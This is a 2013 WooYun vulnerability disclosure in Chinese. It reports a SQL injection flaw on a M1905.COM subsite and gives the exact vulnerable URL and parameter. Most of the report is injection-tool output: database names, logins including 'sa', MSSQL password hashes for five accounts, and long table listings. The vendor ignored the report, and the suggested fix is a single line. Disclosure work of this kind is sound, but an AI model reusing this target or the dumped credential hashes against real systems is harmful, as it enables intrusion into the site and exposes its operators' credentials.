当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034594

漏洞标题:M1905.COM分站SQL注入漏洞

相关厂商:M1905.COM

漏洞作者: Hxai11

提交时间:2013-08-17 16:49

修复时间:2013-08-22 16:50

公开时间:2013-08-22 16:50

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-17: 细节已通知厂商并且等待厂商处理中
2013-08-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

注入怪来了!

详细说明:

注入地址:http://hantao.m1905.com/inc/book.asp?nid=175339

TK5%@QCU)(GKLI1$HR}1LTP.jpg


9_@IUGIC7ZLL8)SP8DZEI]X.jpg


available databases [16]:
[*] bak_cctv6
[*] bbsblog2
[*] cctv6
[*] cmclist
[*] go2m
[*] jfu
[*] master
[*] model
[*] msdb
[*] temp_db
[*] tempdb
[*] tj
[*] tjcctv6
[*] user_int2
[*] webdatagather
[*] yy


[10:13:08] [INFO] retrieved: m1905info
[10:13:44] [INFO] retrieved: m1905read
[10:14:21] [INFO] retrieved: sa
[10:14:29] [INFO] retrieved: shby
[10:14:47] [INFO] retrieved: websqlm1905
[10:15:28] [INFO] fetching number of password hashes for user 'm1905info'
[10:15:28] [INFO] retrieved: 1
[10:15:30] [INFO] fetching password hashes for user 'm1905info'
[10:15:30] [INFO] retrieved: 0x0100ccb4a17415ed75220aa8f7a26c9ef5ddaf36ba608812b
a74
[10:19:55] [INFO] fetching number of password hashes for user 'm1905read'
[10:19:55] [INFO] retrieved: 1
[10:19:57] [INFO] fetching password hashes for user 'm1905read'
[10:19:57] [INFO] retrieved: 0x010000131d5f5f07ed17dabc099cae46b17d90b18ff49dab3
2d8
[10:24:02] [INFO] fetching number of password hashes for user 'sa'
[10:24:02] [INFO] retrieved: 1
[10:24:04] [INFO] fetching password hashes for user 'sa'
[10:24:04] [INFO] retrieved: 0x01004086ceb6b4fe70e9554334c2a77ab722ea8333e67ffb3
25f
[10:27:48] [INFO] fetching number of password hashes for user 'shby'
[10:27:48] [INFO] retrieved: 1
[10:27:50] [INFO] fetching password hashes for user 'shby'
[10:27:50] [INFO] retrieved: 0x0100a3c21f5b78d25306588b9041f0cda9da0d62418da18fd
d9a
[10:31:57] [INFO] fetching number of password hashes for user 'websqlm1905'
[10:31:57] [INFO] retrieved: 1
[10:32:00] [INFO] fetching password hashes for user 'websqlm1905'
[10:32:00] [INFO] retrieved: 0x01008e750f01cd336410014e28f9c1c9632a2659c4d3df99e
39b


Database: cctv6
[101 tables]
+-----------------------+
| CMC |
| FengDuan400 |
| Gradepoint |
| LaterP2P |
| LeavingsMovie |
| MainReview |
| News_Hits |
| Records |
| Stat_Ad_Hits |
| SummerActivity |
| TVote |
| TVoteClass |
| Theater_content |
| Theater_list |
| Theater_type |
| VIEW1 |
| keys |
| act_word |
| adminip |
| bakNEWSP2P |
| bakNEWSP2P_High |
| bakNewLaterP2P |
| border |
| category |
| cctv6_badwords |
| cn |
| comments |
| comments_bak20090714 |
| config |
| dafen |
| diaocha |
| dtproperties |
| ebook_users |
| f_channel |
| f_channel_server |
| hcomments1 |
| info_file |
| info_video |
| ipai_video |
| keynews |
| ku6FilmM1905 |
| ku6videolist |
| list2 |
| log |
| log_sync |
| message |
| msg_review |
| mytest |
| news |
| news20091020 |
| news_ad |
| news_delete090826 |
| news_filmorder_stats |
| news_keys |
| news_keys_content |
| news_parameter |
| news_review |
| news_video_parameter |
| news_video_src |
| newserr |
| p2pResult |
| pd_upfile |
| pl_content |
| pl_list |
| pl_type |
| reg |
| research |
| review |
| searchkeys |
| t_temp_bbs_home |
| t_temp_boke_home |
| t_temp_drm_log |
| t_temp_news_ad |
| t_temp_news_new |
| t_temp_news_subject |
| t_temp_news_videoinfo |
| temp_cinema_top |
| temp_label |
| temp_label_class |
| temp_list_data |
| temp_news |
| temp_other_file |
| temp_other_file_class |
| temp_style |
| temp_style_class |
| temp_templets |
| temp_templets_class |
| template |
| test |
| toupiao |
| toupiao_c |
| toupiaopic |
| trace_20090423 |
| track_20090320 |
| type |
| userCollect |
| user_email |
| userlabel |
| userup |
| v_pl_content |
| ypcomments |
+-----------------------+
Database: user_int2
[7 tables]
+--------------+
| int_config |
| int_conlist |
| int_deta |
| int_detalist |
| int_month |
| int_week |
| int_year |
+--------------+
Database: yy
[5 tables]
+--------------+
| TbNewType |
| Tbadmage |
| Tbnews |
| TbpicType |
| dtproperties |
+--------------+
Database: jfu
[14 tables]
+--------------+
| catalog |
| adgroup |
| app |
| app_en |
| arti |
| arti_en |
| arti_item |
| arti_pic |
| behind_users |
| catalog_12 |
| catalog_en |
| dtproperties |
| info |
| webconfig |
+--------------+
Database: bbsblog2
[98 tables]
+--------------------------+
| Activities |
| Activities_group |
| Activities_list |
| BBSXP_Advertisements |
| BBSXP_BlackWhiteUser |
| BBSXP_EventLog |
| BBSXP_FavoriteForums |
| BBSXP_FavoriteThreads |
| BBSXP_FavoriteUsers |
| BBSXP_FavoriteUsersgroup |
| BBSXP_ForumPermissions |
| BBSXP_Forums |
| BBSXP_Forums_groups |
| BBSXP_Forums_users |
| BBSXP_Groups |
| BBSXP_Links |
| BBSXP_PostAttachments |
| BBSXP_PostRating |
| BBSXP_PrivateMessages |
| BBSXP_Ranks |
| BBSXP_Reputation |
| BBSXP_Roles |
| BBSXP_SiteSettings |
| BBSXP_Statistics |
| BBSXP_Subscriptions |
| BBSXP_Threads |
| BBSXP_UserActivation |
| BBSXP_UserOnline |
| BBSXP_Users |
| BBSXP_Votes |
| Theater_content |
| Theater_list |
| Theater_type |
| all_post1 |
| all_topic |
| blog_Stylecolumn |
| blog_ad |
| blog_code |
| blog_contentraise |
| blog_filelist |
| blog_filemold |
| blog_lastv |
| blog_layout |
| blog_log |
| blog_logclass |
| blog_loguservotes |
| blog_logvotes |
| blog_logvoteslist |
| blog_style |
| blog_styledef |
| blog_styledeflist |
| blog_stylelist |
| blog_subject |
| blog_tags |
| blog_usercolumnid |
| blog_usercontent |
| blog_userdefinition |
| blog_userfile |
| blog_userlinks |
| blog_userlist |
| blog_usermessage |
| blog_userphotoalbum |
| blog_userphotoclass |
| blog_userphotocomments |
| blog_userphotohfcomments |
| blog_userphotos |
| blog_userstyledef |
| blog_usertags |
| blog_usertype |
| dtproperties |
| group_Log |
| group_announce |
| group_class |
| group_gluser |
| group_lastv |
| group_layout |
| group_links |
| group_list |
| group_style |
| group_styledef |
| group_styledeflist |
| group_stylelist |
| group_users |
| group_userstyledef |
| sysdiagrams |
| t08112201 |
| t20081123_1 |
| t20081123_2 |
| t20081123_3 |
| t20081123_4 |
| t20081123_5 |
| t20081123_6 |
| t20081123_7 |
| t20081123_8 |
| t20081126_1 |
| t_temp_bbs_home |
| t_temp_boke_home |
| user_error |
+--------------------------+

漏洞证明:

9_@IUGIC7ZLL8)SP8DZEI]X.jpg

修复方案:

防注入了,少用asp的。。

版权声明:转载请注明来源 Hxai11@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-08-22 16:50

厂商回复:

最新状态:

暂无